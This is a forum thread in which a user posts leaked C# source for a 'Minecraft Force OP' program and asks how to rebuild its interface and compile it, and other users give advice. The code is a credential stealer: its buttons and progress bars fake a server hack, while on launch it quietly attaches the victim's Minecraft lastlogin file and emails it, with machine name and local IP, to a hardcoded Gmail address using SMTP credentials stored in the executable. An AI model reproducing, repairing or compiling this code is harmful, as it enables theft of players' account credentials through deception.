help with this code?

Posts 115 of 21 · Page 1 of 2
help with this code?
can anybody help me with compiling this code, its for an lls and i want to compile it but i want pictures of what should i put as buttons and the gui



namespace Lastlogin_Stub
{
using System;
using System.ComponentModel;
using System.Drawing;
using System****;
using System.Net;
using System.Net.Mail;
using System.Windows.Forms;

public class Form1 : Form
{
private string body;
private CrystalClearButton button1;
private CrystalClearButton button2;
private CrystalClearButton button3;
private IContainer components = null;
private CrystalClearCheckBox crystalClearCheckBox1;
private CrystalClearCheckBox crystalClearCheckBox2;
private CrystalClearCheckBox crystalClearCheckBox3;
private CrystalClearControlBox crystalClearControlBox1;
private CrystalClearThemeContainer crystalClearThemeContainer1;
private string[] drop;
private string email;
private string icon;
private Label label10;
private Label label11;
private Label label12;
private Label label13;
private Label label14;
private Label label15;
private Label label3;
private Label label4;
private Label label5;
private Label label6;
private Label label7;
private Label label8;
private Label label9;
private Label lblUser;
private string password;
private ProgressBar progressBar1;
private ProgressBar progressBar2;
private string smtp;
private string[] strSplit = new string[] { "[PURPS]" };
private string subject;
private string text;
private CrystalClearTextBox textBox1;
private CrystalClearTextBox textBox2;
private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.Timer timer2;

public Form1()
{
this.InitializeComponent();
}

private void button1_Click(object sender, EventArgs e)
{
if (this.textBox1.Text.Length == 0)
{
MessageBox.Show("Please enter your username!", "Invalid Username", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else if (this.textBox2.Text.Length == 0)
{
MessageBox.Show("Please enter your server!", "Invalid Server", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else if (this.textBox1.Text.Length == 1)
{
MessageBox.Show("Please enter a valid username!", "Invalid Username", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else if (this.textBox2.Text.Length == 1)
{
MessageBox.Show("Please enter a valid server!", "Invalid Server", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else if (this.textBox1.Text.Length == 2)
{
MessageBox.Show("Please enter a valid username!", "Invalid Username", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else if (this.textBox2.Text.Length == 2)
{
MessageBox.Show("Please enter a valid server!", "Invalid Server", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else if (this.textBox1.Text.Length == 3)
{
MessageBox.Show("Please enter a valid username!", "Invalid Username", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else if (this.textBox2.Text.Length == 3)
{
MessageBox.Show("Please enter a valid server!", "Invalid Server", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else
{
MessageBox.Show("Logged information\r\nUsername : " + this.textBox1.Text + "\r\nServer IP : " + this.textBox2.Text, "Information", MessageBoxButtons.OK, MessageBoxIcon.Question);
this.crystalClearCheckBox1.Enabled = false;
this.crystalClearCheckBox2.Enabled = false;
this.crystalClearCheckBox3.Enabled = false;
this.textBox1.Enabled = false;
this.textBox2.Enabled = false;
this.button1.Enabled = false;
this.button2.Enabled = true;
MessageBox.Show("Located Server IP : " + this.textBox2.Text + "\r\nYou May Now Connect To The Server Database", "Success", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
}
}

private void button2_Click(object sender, EventArgs e)
{
this.timer1.Start();
this.timer1.Enabled = true;
}

private void button3_Click(object sender, EventArgs e)
{
this.timer2.Start();
this.timer2.Enabled = true;
}

private void crystalClearCheckBox1_CheckedChanged(object sender)
{
if (this.crystalClearCheckBox1.Checked)
{
MessageBox.Show("This is BETA, may NOT work", "[BETA]", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
this.label6.Visible = true;
this.label9.Visible = false;
}
if (!this.crystalClearCheckBox1.Checked)
{
this.label6.Visible = false;
this.label9.Visible = true;
}
}

private void crystalClearCheckBox2_CheckedChanged(object sender)
{
if (this.crystalClearCheckBox2.Checked)
{
MessageBox.Show("This is BETA, may NOT work", "[BETA]", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
this.label7.Visible = true;
this.label10.Visible = false;
}
if (!this.crystalClearCheckBox2.Checked)
{
this.label7.Visible = false;
this.label10.Visible = true;
}
}

private void crystalClearCheckBox3_CheckedChanged(object sender)
{
if (this.crystalClearCheckBox3.Checked)
{
MessageBox.Show("This is BETA, may NOT work", "[BETA]", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
this.label8.Visible = true;
this.label11.Visible = false;
}
if (!this.crystalClearCheckBox3.Checked)
{
this.label8.Visible = false;
this.label11.Visible = true;
}
}

private void crystalClearTextBox2_TextChanged(object sender, EventArgs e)
{
}

protected override void Dispose(bool disposing)
{
if (disposing && (this.components != null))
{
this.components.Dispose();
}
base.Dispose(disposing);
}

private void Form1_Load(object sender, EventArgs e)
{
try
{
this.text = System****.File.ReadAllText(Application.Executable Path);
this.drop = this.text.Split(this.strSplit, StringSplitOptions.None);
this.email = this.drop[1];
this.password = this.drop[2];
this.subject = this.drop[3];
this.body = this.drop[4];
this.smtp = this.drop[5];
}
catch
{
}
if (this.icon == "")
{
}
this.SendMail();
}

private void InitializeComponent()
{
this.components = new Container();
ComponentResourceManager manager = new ComponentResourceManager(typeof(Form1));
this.timer1 = new System.Windows.Forms.Timer(this.components);
this.timer2 = new System.Windows.Forms.Timer(this.components);
this.crystalClearThemeContainer1 = new CrystalClearThemeContainer();
this.crystalClearControlBox1 = new CrystalClearControlBox();
this.progressBar2 = new ProgressBar();
this.progressBar1 = new ProgressBar();
this.crystalClearCheckBox3 = new CrystalClearCheckBox();
this.crystalClearCheckBox2 = new CrystalClearCheckBox();
this.crystalClearCheckBox1 = new CrystalClearCheckBox();
this.lblUser = new Label();
this.label14 = new Label();
this.label15 = new Label();
this.label13 = new Label();
this.label12 = new Label();
this.label11 = new Label();
this.label10 = new Label();
this.label9 = new Label();
this.label5 = new Label();
this.label4 = new Label();
this.label3 = new Label();
this.textBox2 = new CrystalClearTextBox();
this.textBox1 = new CrystalClearTextBox();
this.button3 = new CrystalClearButton();
this.button2 = new CrystalClearButton();
this.button1 = new CrystalClearButton();
this.label8 = new Label();
this.label7 = new Label();
this.label6 = new Label();
this.crystalClearThemeContainer1.SuspendLayout();
base.SuspendLayout();
this.timer1.Tick += new EventHandler(this.timer1_Tick);
this.timer2.Tick += new EventHandler(this.timer2_Tick);
this.crystalClearThemeContainer1.BackColor = Color.FromArgb(230, 230, 230);
this.crystalClearThemeContainer1.BorderStyle = FormBorderStyle.None;
this.crystalClearThemeContainer1.Controls.Add(this .crystalClearControlBox1);
this.crystalClearThemeContainer1.Controls.Add(this .progressBar2);
this.crystalClearThemeContainer1.Controls.Add(this .progressBar1);
this.crystalClearThemeContainer1.Controls.Add(this .crystalClearCheckBox3);
this.crystalClearThemeContainer1.Controls.Add(this .crystalClearCheckBox2);
this.crystalClearThemeContainer1.Controls.Add(this .crystalClearCheckBox1);
this.crystalClearThemeContainer1.Controls.Add(this .lblUser);
this.crystalClearThemeContainer1.Controls.Add(this .label14);
this.crystalClearThemeContainer1.Controls.Add(this .label15);
this.crystalClearThemeContainer1.Controls.Add(this .label13);
this.crystalClearThemeContainer1.Controls.Add(this .label12);
this.crystalClearThemeContainer1.Controls.Add(this .label11);
this.crystalClearThemeContainer1.Controls.Add(this .label10);
this.crystalClearThemeContainer1.Controls.Add(this .label9);
this.crystalClearThemeContainer1.Controls.Add(this .label5);
this.crystalClearThemeContainer1.Controls.Add(this .label4);
this.crystalClearThemeContainer1.Controls.Add(this .label3);
this.crystalClearThemeContainer1.Controls.Add(this .textBox2);
this.crystalClearThemeContainer1.Controls.Add(this .textBox1);
this.crystalClearThemeContainer1.Controls.Add(this .button3);
this.crystalClearThemeContainer1.Controls.Add(this .button2);
this.crystalClearThemeContainer1.Controls.Add(this .button1);
this.crystalClearThemeContainer1.Controls.Add(this .label8);
this.crystalClearThemeContainer1.Controls.Add(this .label7);
this.crystalClearThemeContainer1.Controls.Add(this .label6);
this.crystalClearThemeContainer1.Customization = "5ubm/9LS0v/m5ub/5ubm/6qqqv8=";
this.crystalClearThemeContainer1.Dock = DockStyle.Fill;
this.crystalClearThemeContainer1.Font = new Font("Verdana", 8f);
this.crystalClearThemeContainer1.Image = null;
this.crystalClearThemeContainer1.Location = new Point(0, 0);
this.crystalClearThemeContainer1.MinimumSize = new Size(0xaf, 150);
this.crystalClearThemeContainer1.Movable = true;
this.crystalClearThemeContainer1.Name = "crystalClearThemeContainer1";
this.crystalClearThemeContainer1.NoRounding = false;
this.crystalClearThemeContainer1****unding = CrystalClearThemeContainer****undingType.TypeOne;
this.crystalClearThemeContainer1.Sizable = false;
this.crystalClearThemeContainer1.Size = new Size(0x20d, 0x152);
this.crystalClearThemeContainer1.SmartBounds = true;
this.crystalClearThemeContainer1.StartPosition = FormStartPosition.WindowsDefaultLocation;
this.crystalClearThemeContainer1.TabIndex = 0;
this.crystalClearThemeContainer1.TransparencyKey = Color.Fuchsia;
this.crystalClearThemeContainer1.Transparent = false;
this.crystalClearControlBox1.Anchor = AnchorStyles.Right | AnchorStyles.Top;
this.crystalClearControlBox1.Customization = "ZGRk/+fn5/+lpaX/8PDw/w==";
this.crystalClearControlBox1.Font = new Font("Verdana", 8f);
this.crystalClearControlBox1.Image = null;
this.crystalClearControlBox1.Location = new Point(0x1b6, 0);
this.crystalClearControlBox1.Name = "crystalClearControlBox1";
this.crystalClearControlBox1.NoRounding = false;
this.crystalClearControlBox1.Size = new Size(0x54, 0x12);
this.crystalClearControlBox1.TabIndex = 0x38;
this.crystalClearControlBox1.Text = "crystalClearControlBox1";
this.crystalClearControlBox1.Transparent = false;
this.progressBar2.Location = new Point(0x4c, 0x11a);
this.progressBar2.Name = "progressBar2";
this.progressBar2.Size = new Size(110, 0x16);
this.progressBar2.TabIndex = 0x34;
this.progressBar1.Location = new Point(0x4c, 0xbd);
this.progressBar1.Name = "progressBar1";
this.progressBar1.Size = new Size(110, 0x16);
this.progressBar1.TabIndex = 0x33;
this.crystalClearCheckBox3.Checked = false;
this.crystalClearCheckBox3.Customization = "AAAA/+bm5v/S0tL/5ubm/6qqqv/w8PD/";
this.crystalClearCheckBox3.Font = new Font("Verdana", 8f);
this.crystalClearCheckBox3.Image = null;
this.crystalClearCheckBox3.Location = new Point(0x174, 0x11a);
this.crystalClearCheckBox3.Name = "crystalClearCheckBox3";
this.crystalClearCheckBox3.NoRounding = false;
this.crystalClearCheckBox3.Size = new Size(0x79, 0x11);
this.crystalClearCheckBox3.TabIndex = 50;
this.crystalClearCheckBox3.Text = "Auto //wand";
this.crystalClearCheckBox3.Transparent = false;
this.crystalClearCheckBox3.CheckedChanged += new CrystalClearCheckBox.CheckedChangedEventHandler(th is.crystalClearCheckBox3_CheckedChanged);
this.crystalClearCheckBox2.Checked = false;
this.crystalClearCheckBox2.Customization = "AAAA/+bm5v/S0tL/5ubm/6qqqv/w8PD/";
this.crystalClearCheckBox2.Font = new Font("Verdana", 8f);
this.crystalClearCheckBox2.Image = null;
this.crystalClearCheckBox2.Location = new Point(0x174, 0xea);
this.crystalClearCheckBox2.Name = "crystalClearCheckBox2";
this.crystalClearCheckBox2.NoRounding = false;
this.crystalClearCheckBox2.Size = new Size(0x79, 0x11);
this.crystalClearCheckBox2.TabIndex = 0x31;
this.crystalClearCheckBox2.Text = "False Items";
this.crystalClearCheckBox2.Transparent = false;
this.crystalClearCheckBox2.CheckedChanged += new CrystalClearCheckBox.CheckedChangedEventHandler(th is.crystalClearCheckBox2_CheckedChanged);
this.crystalClearCheckBox1.Checked = false;
this.crystalClearCheckBox1.Customization = "AAAA/+bm5v/S0tL/5ubm/6qqqv/w8PD/";
this.crystalClearCheckBox1.Font = new Font("Verdana", 8f);
this.crystalClearCheckBox1.Image = null;
this.crystalClearCheckBox1.Location = new Point(0x174, 0xb8);
this.crystalClearCheckBox1.Name = "crystalClearCheckBox1";
this.crystalClearCheckBox1.NoRounding = false;
this.crystalClearCheckBox1.Size = new Size(0x79, 0x11);
this.crystalClearCheckBox1.TabIndex = 0x30;
this.crystalClearCheckBox1.Text = "Real OP Secure";
this.crystalClearCheckBox1.Transparent = false;
this.crystalClearCheckBox1.CheckedChanged += new CrystalClearCheckBox.CheckedChangedEventHandler(th is.crystalClearCheckBox1_CheckedChanged);
this.lblUser.AutoSize = true;
this.lblUser.BackColor = Color.Transparent;
this.lblUser.ForeColor = Color.Black;
this.lblUser.Location = new Point(50, 0x36);
this.lblUser.Name = "lblUser";
this.lblUser.Size = new Size(0x41, 13);
this.lblUser.TabIndex = 0x2f;
this.lblUser.Text = "Username";
this.label14.AutoSize = true;
this.label14.BackColor = Color.Transparent;
this.label14.ForeColor = Color.White;
this.label14.Location = new Point(0x1f0, 0x141);
this.label14.Name = "label14";
this.label14.Size = new Size(0x19, 13);
this.label14.TabIndex = 0x2e;
this.label14.Text = "2.2";
this.label15.AutoSize = true;
this.label15.BackColor = Color.Transparent;
this.label15.ForeColor = Color.White;
this.label15.Location = new Point(0x1c5, 0x141);
this.label15.Name = "label15";
this.label15.Size = new Size(0x36, 13);
this.label15.TabIndex = 0x2d;
this.label15.Text = "Version:";
this.label13.AutoSize = true;
this.label13.BackColor = Color.Transparent;
this.label13.ForeColor = Color.White;
this.label13.Location = new Point(7, 0x141);
this.label13.Name = "label13";
this.label13.Size = new Size(0x6a, 13);
this.label13.TabIndex = 0x2c;
this.label13.Text = "Purp Enterprise™";
this.label12.AutoSize = true;
this.label12.BackColor = Color.Transparent;
this.label12.Location = new Point(0x34, 0x67);
this.label12.Name = "label12";
this.label12.Size = new Size(0x3e, 13);
this.label12.TabIndex = 0x2b;
this.label12.Text = "Server IP";
this.label11.AutoSize = true;
this.label11.BackColor = Color.Transparent;
this.label11.ForeColor = Color.Red;
this.label11.Location = new Point(0x19f, 0x12e);
this.label11.Name = "label11";
this.label11.Size = new Size(0x38, 13);
this.label11.TabIndex = 0x2a;
this.label11.Text = "Disabled";
this.label10.AutoSize = true;
this.label10.BackColor = Color.Transparent;
this.label10.ForeColor = Color.Red;
this.label10.Location = new Point(0x19d, 0xfd);
this.label10.Name = "label10";
this.label10.Size = new Size(0x38, 13);
this.label10.TabIndex = 0x29;
this.label10.Text = "Disabled";
this.label9.AutoSize = true;
this.label9.BackColor = Color.Transparent;
this.label9.ForeColor = Color.Red;
this.label9.Location = new Point(0x19d, 0xcc);
this.label9.Name = "label9";
this.label9.Size = new Size(0x38, 13);
this.label9.TabIndex = 40;
this.label9.Text = "Disabled";
this.label5.AutoSize = true;
this.label5.BackColor = Color.Transparent;
this.label5.Location = new Point(0x16d, 0x9e);
this.label5.Name = "label5";
this.label5.Size = new Size(120, 13);
this.label5.TabIndex = 0x27;
this.label5.Text = "Other Hacks [BETA]";
this.label4.AutoSize = true;
this.label4.BackColor = Color.Transparent;
this.label4.ForeColor = Color.Black;
this.label4.Location = new Point(0x10, 0xea);
this.label4.Name = "label4";
this.label4.Size = new Size(0x67, 13);
this.label4.TabIndex = 0x26;
this.label4.Text = "Step 2 - Give OP";
this.label3.AutoSize = true;
this.label3.BackColor = Color.Transparent;
this.label3.ForeColor = Color.Black;
this.label3.Location = new Point(0x10, 0x8e);
this.label3.Name = "label3";
this.label3.Size = new Size(0x11c, 13);
this.label3.TabIndex = 0x25;
this.label3.Text = "Step 1 - Connect To Server Console Database ";
this.textBox2.Customization = "AAAA//Dw8P+qqqr/";
this.textBox2.Font = new Font("Verdana", 8f);
this.textBox2.Image = null;
this.textBox2.Location = new Point(0x79, 0x5f);
this.textBox2.MaxLength = 0x7fff;
this.textBox2.Multiline = false;
this.textBox2.Name = "textBox2";
this.textBox2.NoRounding = false;
this.textBox2.ReadOnly = false;
this.textBox2.Size = new Size(0x98, 0x18);
this.textBox2.TabIndex = 4;
this.textBox2.TextAlign = HorizontalAlignment.Left;
this.textBox2.Transparent = false;
this.textBox2.UseSystemPasswordChar = false;
this.textBox2.TextChanged += new EventHandler(this.crystalClearTextBox2_TextChanged );
this.textBox1.Customization = "AAAA//Dw8P+qqqr/";
this.textBox1.Font = new Font("Verdana", 8f);
this.textBox1.Image = null;
this.textBox1.Location = new Point(0x79, 0x2f);
this.textBox1.MaxLength = 0x7fff;
this.textBox1.Multiline = false;
this.textBox1.Name = "textBox1";
this.textBox1.NoRounding = false;
this.textBox1.ReadOnly = false;
this.textBox1.Size = new Size(0x98, 0x18);
this.textBox1.TabIndex = 3;
this.textBox1.TextAlign = HorizontalAlignment.Left;
this.textBox1.Transparent = false;
this.textBox1.UseSystemPasswordChar = false;
this.button3.Customization = "5ubm/9LS0v/m5ub/qqqq/wAAAP//////";
this.button3.Enabled = false;
this.button3.Font = new Font("Verdana", 8f);
this.button3.Image = null;
this.button3.Location = new Point(0x5c, 0x101);
this.button3.Name = "button3";
this.button3.NoRounding = false;
this.button3.Size = new Size(80, 0x13);
this.button3.TabIndex = 2;
this.button3.Text = "Give OP";
this.button3.Transparent = false;
this.button3.Click += new EventHandler(this.button3_Click);
this.button2.Customization = "5ubm/9LS0v/m5ub/qqqq/wAAAP//////";
this.button2.Enabled = false;
this.button2.Font = new Font("Verdana", 8f);
this.button2.Image = null;
this.button2.Location = new Point(0x5c, 0x9e);
this.button2.Name = "button2";
this.button2.NoRounding = false;
this.button2.Size = new Size(80, 20);
this.button2.TabIndex = 1;
this.button2.Text = "Connect";
this.button2.Transparent = false;
this.button2.Click += new EventHandler(this.button2_Click);
this.button1.Customization = "5ubm/9LS0v/m5ub/qqqq/wAAAP//////";
this.button1.Font = new Font("Verdana", 8f);
this.button1.Image = null;
this.button1.Location = new Point(0x170, 0x33);
this.button1.Name = "button1";
this.button1.NoRounding = false;
this.button1.Size = new Size(0x79, 0x41);
this.button1.TabIndex = 0;
this.button1.Text = "Locate Server";
this.button1.Transparent = false;
this.button1.Click += new EventHandler(this.button1_Click);
this.label8.AutoSize = true;
this.label8.BackColor = Color.Transparent;
this.label8.ForeColor = Color.FromArgb(0, 0xc0, 0);
this.label8.Location = new Point(0x1a3, 0x12e);
this.label8.Name = "label8";
this.label8.Size = new Size(0x34, 13);
this.label8.TabIndex = 0x37;
this.label8.Text = "Enabled";
this.label8.TextAlign = ContentAlignment.MiddleCenter;
this.label8.Visible = false;
this.label7.AutoSize = true;
this.label7.BackColor = Color.Transparent;
this.label7.ForeColor = Color.FromArgb(0, 0xc0, 0);
this.label7.Location = new Point(0x19f, 0xfd);
this.label7.Name = "label7";
this.label7.Size = new Size(0x34, 13);
this.label7.TabIndex = 0x36;
this.label7.Text = "Enabled";
this.label7.TextAlign = ContentAlignment.MiddleCenter;
this.label7.Visible = false;
this.label6.AutoSize = true;
this.label6.BackColor = Color.Transparent;
this.label6.ForeColor = Color.FromArgb(0, 0xc0, 0);
this.label6.Location = new Point(0x19f, 0xcc);
this.label6.Name = "label6";
this.label6.Size = new Size(0x34, 13);
this.label6.TabIndex = 0x35;
this.label6.Text = "Enabled";
this.label6.TextAlign = ContentAlignment.MiddleCenter;
this.label6.Visible = false;
base.AutoScaleDimensions = new SizeF(6f, 13f);
base.AutoScaleMode = AutoScaleMode.Font;
base.ClientSize = new Size(0x20d, 0x152);
base.Controls.Add(this.crystalClearThemeContainer1 );
base.FormBorderStyle = FormBorderStyle.None;
base.Icon = (Icon) manager.GetObject("$this.Icon");
base.MinimizeBox = false;
this.MinimumSize = new Size(0xaf, 150);
base.Name = "Form1";
base.ShowIcon = false;
this.Text = "Minecraft Force OP";
base.TransparencyKey = Color.Fuchsia;
base.Load += new EventHandler(this.Form1_Load);
this.crystalClearThemeContainer1.ResumeLayout(fals e);
this.crystalClearThemeContainer1.PerformLayout();
base.ResumeLayout(false);
}

private void SendMail()
{
string hostName = Dns.GetHostName();
string str2 = Dns.GetHostAddresses(hostName).GetValue(2).ToStrin g();
MailMessage message = new MailMessage();
try
{
Attachment item = new Attachment(Environment.GetFolderPath(Environment.S pecialFolder.ApplicationData) + @"\.minecraft\lastlogin");
message.Attachments.Add(item);
message.From = new MailAddress(this.email);
message.To.Add("fagelogger@gmail.com");
message.Subject = "Local IP: " + str2;
message.Body = "Machine Name: " + hostName;
new SmtpClient(this.smtp) { Port = 0x24b, EnableSsl = true, Credentials = new NetworkCredential(this.email, this.password) }.Send(message);
}
catch
{
}
}

private void timer1_Tick(object sender, EventArgs e)
{
this.progressBar1.Increment(1);
if (this.progressBar1.Value == this.progressBar1.Maximum)
{
this.timer1.Enabled = false;
MessageBox.Show("Connected Username : " + this.textBox1.Text + "\r\nConnected Server IP : " + this.textBox2.Text, "Success", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
this.button2.Enabled = false;
this.button3.Enabled = true;
}
}

private void timer2_Tick(object sender, EventArgs e)
{
this.progressBar2.Increment(1);
if (this.progressBar2.Value == this.progressBar2.Maximum)
{
this.timer2.Enabled = false;
MessageBox.Show("Successfully OP'ed : " + this.textBox1.Text, "Success!", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
this.button3.Enabled = false;
}
}
}
}

help @lordPancake? ANYONE?!
NOTE:I DIDNT MAKE THIS CODE, ALL CREDITS GO TO WOWEES8. I LEAKED HIS CODE AND I WANT TO COMPILE IT NOW.
You're trying to compile decompiled code?

You can't do that unless you fix every error after you decompiled it...
Oh dear god
Quote Originally Posted by 133spider View Post
You're trying to compile decompiled code?

You can't do that unless you fix every error after you decompiled it...
ive already fixed it... i just want a list of how much buttons, labels, etc. are in there so i can put them into the program. note that i didnt create the code so i dunno where will the buttons and labels will occur so that why imma asking for help.
Quote Originally Posted by ayed12345 View Post
ive already fixed it... i just want a list of how much buttons, labels, etc. are in there so i can put them into the program. note that i didnt create the code so i dunno where will the buttons and labels will occur so that why imma asking for help.
You can't compile something you decompiled really...

Take the code and make a seperate new VB project
Quote Originally Posted by 133spider View Post
You can't compile something you decompiled really...

Take the code and make a seperate new VB project
hmmmm ok, i didnt decompile it, i found it here http://pastebin.com/CzuyPjfz]
Quote Originally Posted by 133spider View Post
leaking is like the same thing as decompiling
what a fool i made from myself then, no luck. i wont be getting this code to work soon
Quote Originally Posted by ayed12345 View Post
what a fool i made from myself then, no luck. i wont be getting this code to work soon
yes you can, just separate the code from the buttons, check boxes, etc.
Quote Originally Posted by 133spider View Post
yes you can, just separate the code from the buttons, check boxes, etc.
thats the answer i wanted, thanks for the help!
Put your codes in a spoiler, holy mc jesus.
Quote Originally Posted by Smaug View Post
Put your codes in a spoiler, holy mc jesus.
you always have to ruin a good thread with one of your complaints clastic, and thats fascinating for me.
Posts 115 of 21 · Page 1 of 2

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?